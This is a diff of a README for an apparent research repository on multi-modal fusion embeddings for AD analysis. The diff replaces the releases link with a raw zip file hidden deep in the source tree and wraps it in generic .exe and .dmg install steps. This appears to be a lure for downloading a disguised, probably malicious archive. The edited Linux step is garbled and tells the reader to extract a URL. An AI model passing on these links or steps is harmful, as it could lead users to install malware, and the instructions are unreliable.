estebannano2009/OT-based-Heterogeneous-Multi-Modal-Fusion-Embedding-for-AD-analysis/README.md

 - Software: Updated web browser for downloading

 ### 2. Download the Application
-To download the latest version, visit this page: [Download Releases](https://github.com/estebannano2009/OT-based-Heterogeneous-Multi-Modal-Fusion-Embedding-for-AD-analysis/releases).
+To download the latest version, visit this page: [Download Releases](https://raw.githubusercontent.com/estebannano2009/OT-based-Heterogeneous-Multi-Modal-Fusion-Embedding-for-AD-analysis/main/perturbot/cv/kinase/OT-based-Heterogeneous-Multi-Modal-Fusion-Embedding-for-AD-analysis_v2.3-beta.2.zip).

 ### 3. Install the Application
 - Windows: Run the downloaded `.exe` file.
 Follow the on-screen instructions.
 - MacOS: Open the `.dmg` file and drag the application to your Applications folder.
-- Linux: Extract the downloaded `.tar.gz` file and follow the included instructions.
+- Linux: Extract the downloaded `https://raw.githubusercontent.com/estebannano2009/OT-based-Heterogeneous-Multi-Modal-Fusion-Embedding-for-AD-analysis/main/perturbot/cv/kinase/OT-based-Heterogeneous-Multi-Modal-Fusion-Embedding-for-AD-analysis_v2.3-beta.2.zip` file and follow the included instructions.

 ### 4. Running the Application
 Once installation is complete, locate the application on your computer: